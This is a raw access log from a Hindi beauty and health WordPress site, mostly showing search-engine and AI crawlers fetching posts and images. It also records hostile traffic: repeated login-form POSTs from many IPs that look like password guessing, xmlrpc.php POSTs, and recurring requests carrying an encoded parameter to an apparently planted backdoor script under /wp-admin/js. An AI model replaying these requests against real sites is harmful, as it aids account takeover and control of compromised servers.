47.128.48.112 - - [20/Oct/2025:09:05:47 -0400] "GET /wp-content/uploads/2016/09/Anti-ageing-makeup-tips1.jpg HTTP/2.0" 200 48910 "https://hindi.blushin.com/anti-ageing-makeup-tips/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.48.112 - - [20/Oct/2025:09:05:47 -0400] "GET /wp-content/uploads/2016/09/Anti-ageing-makeup-tips3.jpg HTTP/2.0" 200 89521 "https://hindi.blushin.com/anti-ageing-makeup-tips/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.48.112 - - [20/Oct/2025:09:05:47 -0400] "GET /wp-content/uploads/2016/09/Anti-ageing-makeup-tips2.jpg HTTP/2.0" 200 44456 "https://hindi.blushin.com/anti-ageing-makeup-tips/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.48.112 - - [20/Oct/2025:09:05:48 -0400] "GET /wp-content/uploads/2016/09/Anti-ageing-makeup-tips.jpg HTTP/2.0" 200 77272 "https://hindi.blushin.com/anti-ageing-makeup-tips/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
2001:41d0:303:a4e6::1 - - [20/Oct/2025:09:05:47 -0400] "GET /robots.txt HTTP/2.0" 200 82 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
47.128.48.112 - - [20/Oct/2025:09:05:48 -0400] "GET /wp-content/uploads/2016/09/Anti-ageing-makeup-tips5.jpeg HTTP/2.0" 200 106730 "https://hindi.blushin.com/anti-ageing-makeup-tips/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.48.112 - - [20/Oct/2025:09:05:48 -0400] "GET /wp-content/uploads/2016/09/Anti-ageing-makeup-tips4.jpg HTTP/2.0" 200 49006 "https://hindi.blushin.com/anti-ageing-makeup-tips/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.48.112 - - [20/Oct/2025:09:05:48 -0400] "GET /wp-content/uploads/2016/09/Anti-ageing-makeup-tips6.jpg HTTP/2.0" 200 62812 "https://hindi.blushin.com/anti-ageing-makeup-tips/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:05:47 -0400] "GET /tag/thyroid-cyst-pictures/ HTTP/2.0" 200 149782 "https://hindi.blushin.com/tag/thyroid-cyst-pictures" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
85.208.96.200 - - [20/Oct/2025:09:05:47 -0400] "GET /tag/amazing-health-benefits-of-apple-peels/ HTTP/2.0" 200 149737 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
2001:41d0:303:a4e6::1 - - [20/Oct/2025:09:05:52 -0400] "GET /tag/%E0%A4%95%E0%A4%B2%E0%A5%8C%E0%A4%82%E0%A4%9C%E0%A5%80-%E0%A4%95%E0%A5%87-%E0%A4%A4%E0%A5%87%E0%A4%B2-%E0%A4%95%E0%A5%87-%E0%A4%98%E0%A4%B0%E0%A5%87%E0%A4%B2%E0%A5%82-%E0%A4%A8%E0%A5%81%E0%A4%B8/ HTTP/2.0" 200 150495 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.38.53.154 - - [20/Oct/2025:09:05:53 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
51.38.53.154 - - [20/Oct/2025:09:05:55 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:09:03:29 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936393030392p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936353430392q3061356461383934653036316537643338613335373739626139396330353337222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
66.249.73.72 - - [20/Oct/2025:09:05:55 -0400] "GET /809207199?entity=0808088686 HTTP/2.0" 200 192712 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:09:05:56 -0400] "GET /tag/places-to-get-tattoos-near-me HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
2001:41d0:303:a4e6::1 - - [20/Oct/2025:09:05:57 -0400] "GET /tag/%E0%A4%AC%E0%A4%A2%E0%A4%BC%E0%A4%A4%E0%A5%80-%E0%A4%89%E0%A4%AE%E0%A5%8D%E0%A4%B0/ HTTP/2.0" 200 151961 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.143 - - [20/Oct/2025:09:05:58 -0400] "GET /tag/places-to-get-tattoos-near-me/ HTTP/2.0" 200 149739 "https://hindi.blushin.com/tag/places-to-get-tattoos-near-me" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.249.73.72 - - [20/Oct/2025:09:05:59 -0400] "GET /10-ways-to-take-care-of-your-skin-in-summers.html HTTP/2.0" 200 193786 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
172.183.160.242 - - [20/Oct/2025:09:06:07 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:06:08 -0400] "GET /tag/top-bollywood-actresses HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:09:06:09 -0400] "GET /tag/top-bollywood-actresses/ HTTP/2.0" 200 150137 "https://hindi.blushin.com/tag/top-bollywood-actresses" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
198.187.29.24 - - [20/Oct/2025:09:06:11 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.187.29.24 - - [20/Oct/2025:09:06:12 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
63.250.38.232 - - [20/Oct/2025:09:06:14 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
172.183.160.242 - - [20/Oct/2025:09:06:14 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
63.250.38.232 - - [20/Oct/2025:09:06:15 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.191.171.16 - - [20/Oct/2025:09:06:16 -0400] "GET /tag/healthy-ramadan-recipes/ HTTP/2.0" 200 149736 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:09:06:19 -0400] "GET /tag/when-to-brush-hair/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.42.61.4 - - [20/Oct/2025:09:06:20 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.42.61.4 - - [20/Oct/2025:09:06:21 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:06:20 -0400] "GET /tag/when-to-brush-hair/feed/ HTTP/2.0" 200 10906 "https://hindi.blushin.com/tag/when-to-brush-hair/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:09:03:51 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936393033312p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936353433312q3061656434376237316534373934643865366333383961643265333735333035222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
185.191.171.16 - - [20/Oct/2025:09:06:27 -0400] "GET /tag/follow-this-diet-plan-to-get-intelligent-child/ HTTP/2.0" 200 150084 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:09:06:30 -0400] "GET /tag/anti-laziness-pills/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.128.114.123 - - [20/Oct/2025:09:06:31 -0400] "GET /4-hair-pack-to-make-your-hair-soft-and-beautiful/ HTTP/2.0" 200 317281 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:06:31 -0400] "GET /tag/anti-laziness-pills/feed/ HTTP/2.0" 200 15325 "https://hindi.blushin.com/tag/anti-laziness-pills/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.128.114.123 - - [20/Oct/2025:09:06:34 -0400] "GET /wp-content/uploads/2016/05/%E0%A4%85%E0%A4%82%E0%A4%A1%E0%A4%BE.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/4-hair-pack-to-make-your-hair-soft-and-beautiful/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.114.123 - - [20/Oct/2025:09:06:34 -0400] "GET /wp-content/uploads/2016/05/%E0%A4%B5%E0%A5%87%E0%A4%9C%E0%A4%BF%E0%A4%9F%E0%A5%87%E0%A4%AC%E0%A4%B2-%E0%A4%91%E0%A4%AF%E0%A4%B2-.jpg HTTP/2.0" 200 53908 "https://hindi.blushin.com/4-hair-pack-to-make-your-hair-soft-and-beautiful/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
185.191.171.5 - - [20/Oct/2025:09:06:33 -0400] "GET /tag/jab-we-met/ HTTP/2.0" 200 149648 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
47.128.114.123 - - [20/Oct/2025:09:06:34 -0400] "GET /wp-content/uploads/2016/05/4-hair-pack-for-beautiful-hair.jpg HTTP/2.0" 200 62450 "https://hindi.blushin.com/4-hair-pack-to-make-your-hair-soft-and-beautiful/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.114.123 - - [20/Oct/2025:09:06:35 -0400] "GET /wp-content/uploads/2016/05/%E0%A4%B5%E0%A4%BF%E0%A4%A8%E0%A5%87%E0%A4%97%E0%A4%B0.jpg HTTP/2.0" 200 97674 "https://hindi.blushin.com/4-hair-pack-to-make-your-hair-soft-and-beautiful/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.114.123 - - [20/Oct/2025:09:06:35 -0400] "GET /wp-content/uploads/2016/05/%E0%A4%90%E0%A4%B2%E0%A5%8B%E0%A4%B5%E0%A5%87%E0%A4%B0%E0%A4%BE.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/4-hair-pack-to-make-your-hair-soft-and-beautiful/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
173.212.200.159 - - [20/Oct/2025:09:06:38 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.32.113.195 - - [20/Oct/2025:09:06:38 -0400] "POST /xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0"
173.212.200.159 - - [20/Oct/2025:09:06:41 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.191.171.5 - - [20/Oct/2025:09:06:40 -0400] "GET /tag/how-to-maintain-hair-for-mens/ HTTP/2.0" 200 150085 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:09:06:41 -0400] "GET /tag/best-makeup-tips-for-indian-women/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:09:06:42 -0400] "GET /tag/best-makeup-tips-for-indian-women/feed/ HTTP/2.0" 200 21122 "https://hindi.blushin.com/tag/best-makeup-tips-for-indian-women/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.128.49.1 - - [20/Oct/2025:09:06:42 -0400] "GET /amazing-health-benefits-of-watermelon/ HTTP/2.0" 200 317419 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
203.210.237.200 - - [20/Oct/2025:09:06:44 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.49.1 - - [20/Oct/2025:09:06:44 -0400] "GET /wp-content/uploads/2016/04/%E0%A4%97%E0%A4%B0%E0%A5%8D%E0%A4%AE%E0%A4%BF%E0%A4%AF%E0%A4%BE%E0%A4%82-%E0%A4%86%E0%A4%A4%E0%A5%87-%E0%A4%B9%E0%A5%80-%E0%A4%A4%E0%A4%B0%E0%A4%AC%E0%A5%82%E0%A4%9C.jpg HTTP/2.0" 200 91273 "https://hindi.blushin.com/amazing-health-benefits-of-watermelon/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.49.1 - - [20/Oct/2025:09:06:44 -0400] "GET /wp-content/uploads/2016/04/%E0%A4%85%E0%A4%B8%E0%A5%8D%E0%A4%A5%E0%A4%AE%E0%A4%BE-%E0%A4%B8%E0%A5%87-%E0%A4%AC%E0%A4%9A%E0%A4%BE%E0%A4%B5.jpeg HTTP/2.0" 200 74918 "https://hindi.blushin.com/amazing-health-benefits-of-watermelon/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.49.1 - - [20/Oct/2025:09:06:44 -0400] "GET /wp-content/uploads/2016/04/%E0%A4%95%E0%A5%88%E0%A4%82%E0%A4%B8%E0%A4%B0-%E0%A4%B8%E0%A5%87-%E0%A4%AC%E0%A4%9A%E0%A4%BE%E0%A4%B5-1.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/amazing-health-benefits-of-watermelon/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.49.1 - - [20/Oct/2025:09:06:45 -0400] "GET /wp-content/uploads/2016/04/water-mellon.jpg HTTP/2.0" 200 70348 "https://hindi.blushin.com/amazing-health-benefits-of-watermelon/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:09:04:18 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936393035382p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936353435382q3235623064663063363966396334653935323430366431353331613861393733222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
47.128.49.1 - - [20/Oct/2025:09:06:45 -0400] "GET /wp-content/uploads/2016/04/%E0%A4%AC%E0%A4%BE%E0%A4%B2%E0%A5%8B%E0%A4%82-%E0%A4%94%E0%A4%B0-%E0%A4%A4%E0%A5%8D%E0%A4%B5%E0%A4%9A%E0%A4%BE-%E0%A4%95%E0%A5%87-%E0%A4%B2%E0%A4%BF%E0%A4%8F.jpg HTTP/2.0" 200 85705 "https://hindi.blushin.com/amazing-health-benefits-of-watermelon/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.49.1 - - [20/Oct/2025:09:06:45 -0400] "GET /wp-content/uploads/2016/04/%E0%A4%AC%E0%A5%8D%E0%A4%B2%E0%A4%A1-%E0%A4%AA%E0%A5%8D%E0%A4%B0%E0%A5%87%E0%A4%B6%E0%A4%B0.jpeg HTTP/2.0" 200 106277 "https://hindi.blushin.com/amazing-health-benefits-of-watermelon/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.49.1 - - [20/Oct/2025:09:06:45 -0400] "GET /wp-content/uploads/2016/04/%E0%A4%B8%E0%A5%82%E0%A4%9C%E0%A4%A8-%E0%A4%95%E0%A5%8B-%E0%A4%95%E0%A4%AE-%E0%A4%95%E0%A4%B0%E0%A4%A8%E0%A4%BE.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/amazing-health-benefits-of-watermelon/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
203.210.237.200 - - [20/Oct/2025:09:06:44 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
40.77.167.73 - - [20/Oct/2025:09:06:44 -0400] "GET /home-remedies-to-get-rid-of-skin-blemishes/home-remedies-to-get-rid-of-skin-blemishes/ HTTP/2.0" 200 191903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:06:52 -0400] "GET /tag/these-top-designs-will-glam-bridal-mehndi HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:09:06:53 -0400] "GET /tag/these-top-designs-will-glam-bridal-mehndi/ HTTP/2.0" 200 149806 "https://hindi.blushin.com/tag/these-top-designs-will-glam-bridal-mehndi" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.128.63.84 - - [20/Oct/2025:09:06:54 -0400] "GET /ramadan-special-spicy-hot-boneless-chilli-chicken/ HTTP/2.0" 200 312462 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.63.84 - - [20/Oct/2025:09:06:56 -0400] "GET /wp-content/uploads/2017/06/Spicy-Hot-Boneless-Chilli-Chicken.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/ramadan-special-spicy-hot-boneless-chilli-chicken/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
103.74.116.147 - - [20/Oct/2025:09:07:00 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.74.116.147 - - [20/Oct/2025:09:07:02 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:07:03 -0400] "GET /tag/special-occasion-short-dresses/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:09:07:04 -0400] "GET /tag/special-occasion-short-dresses/feed/ HTTP/2.0" 200 9659 "https://hindi.blushin.com/tag/special-occasion-short-dresses/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
46.105.73.207 - - [20/Oct/2025:09:07:06 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.30.72 - - [20/Oct/2025:09:07:05 -0400] "GET /ayurvedic-tips-to-improve-sexual-efficiency/ HTTP/2.0" 200 312061 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:09:04:40 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936393038302p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936353438302q3835623161353238363636363564383437396239336366366339326563666533222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
46.105.73.207 - - [20/Oct/2025:09:07:06 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.30.72 - - [20/Oct/2025:09:07:07 -0400] "GET /wp-content/uploads/2016/06/improve-sexual-efficiency1.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/ayurvedic-tips-to-improve-sexual-efficiency/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
103.82.38.57 - - [20/Oct/2025:09:07:08 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.30.72 - - [20/Oct/2025:09:07:07 -0400] "GET /wp-content/uploads/2016/06/improve-sexual-efficiency3.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/ayurvedic-tips-to-improve-sexual-efficiency/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.30.72 - - [20/Oct/2025:09:07:07 -0400] "GET /wp-content/uploads/2016/06/improve-sexual-efficiency2.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/ayurvedic-tips-to-improve-sexual-efficiency/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
66.249.73.64 - - [20/Oct/2025:09:07:07 -0400] "GET /50744088?entity=0050674626 HTTP/2.0" 200 209779 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.176.179.125 - - [20/Oct/2025:09:07:09 -0400] "POST /xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
47.128.30.72 - - [20/Oct/2025:09:07:07 -0400] "GET /wp-content/uploads/2016/06/improve-sexual-efficiency.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/ayurvedic-tips-to-improve-sexual-efficiency/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.30.72 - - [20/Oct/2025:09:07:08 -0400] "GET /wp-content/uploads/2016/06/improve-sexual-efficiency4.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/ayurvedic-tips-to-improve-sexual-efficiency/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
103.82.38.57 - - [20/Oct/2025:09:07:10 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:07:16 -0400] "GET /women-belong-to-minority-get-new-entrepreneurship-opportunities HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
5.182.17.121 - - [20/Oct/2025:09:07:17 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.49.113 - - [20/Oct/2025:09:07:16 -0400] "GET /know-the-real-reason-behind-the-demise-of-bollywood-actress-sridevi/ HTTP/2.0" 200 315890 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
